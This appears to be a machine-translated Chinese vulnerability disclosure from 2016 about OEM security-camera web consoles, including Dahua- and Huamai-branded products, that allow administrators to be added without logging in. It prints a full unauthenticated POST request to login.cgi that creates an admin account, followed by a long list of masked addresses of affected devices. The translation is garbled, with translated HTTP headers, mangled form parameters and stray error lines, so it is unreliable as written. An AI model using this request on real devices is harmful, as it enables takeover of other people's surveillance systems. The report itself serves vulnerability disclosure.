漏洞标题 OEM安全监控产品设计中的缺陷(您可以在不登录的情况下添加任何管理) 相关制造商 OEM安全监控 漏洞作者 过路人 提交时间 2016-03-10 12: 20 公共时间 2016-06-12 16: 00 漏洞类型 设计缺陷/逻辑错误 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 设计缺陷/边界旁路,逻辑错误 漏洞详细信息 参与以下公司 大华电子眼[电子邮件 保护]/*
Huamai千里眼[电邮 保护]/*
鼎世千里眼[email protected]/*
[电子邮件 保护]/*合作,还有一些没有LOGO的情况(具体型号请登录案例测试) 永安居天翼卫士 永安居永安普 天翼之眼 189看视频管家 漏洞证明: 根据互联网案例测试,发现有些产品没有启用登录功能(可以直接进入监控控制台),有些产品启用了登录功能。您可以使用post包直接添加任何管理员(无需登录,全局功能未经授权访问)。 POST /cn/base/cgi-bin/login.cgi?save HTTP/1.1 主机:地址 内容长度: 249 接受: application/json,text/javascript,*/*; Q=0.01 Failure when receiving data from the peer Keyenable=1&安培;用户名=管理员&安培;密码=wooyun&安培;组=0&安培; NAME1=安培; pwd1=安培;组1=2及名称2=&安培; pwd2=安培;组2=2及NAME3=安培; pwd3=安培;组3=2及NAME4=安培; pwd4=安培;组4=2及NAME5=安培; pwd5=安培;组5=2及name6=安培; pwd6=安培; 6组=2及name7=安培; pwd7=安培;组7=2及Name8=安培; pwd8=安培;组8=2及name9=安培; pwd9=安培;组9=2
案件: 以下情况需要登录验证(您可以直接使用post包添加管理员): **。**。**。**/CN / **。**。**。**/EN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**: 83/cn / **。**。**。**: 82/cn / **。**。**。**: 82/cn / **。**。**。**/CN / **。**。**。**: 82/cn / **。**。**。**: 81/cn / **。**。**。**: 81/cn / **。**。**。**: 81/cn / **。**。**。**/CN / **。**。**。**: 82/cn / **。**。**。**: 82/cn / **。**。**。**: 81/cn / **。**。**。**: 100/cn / **。**。**。**: 8081/cn / **。**。**。**: 81/cn / 以下情况没有直接打开控制台的登录验证功能: **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**/CN / **。**。**。**: 100/cn/Huamai Clairvoyen see1000 **。**。**。**: 81/cn / **。**。**。**: 89/cn / **。**。**。**: 81/cn / **。**。**。**: 88/cn / **。**。**。**: 81/cn / **。**。**。**/CN / **。**。**。**: 81/cn / **。**。**。**/CN / Failure when receiving data from the peer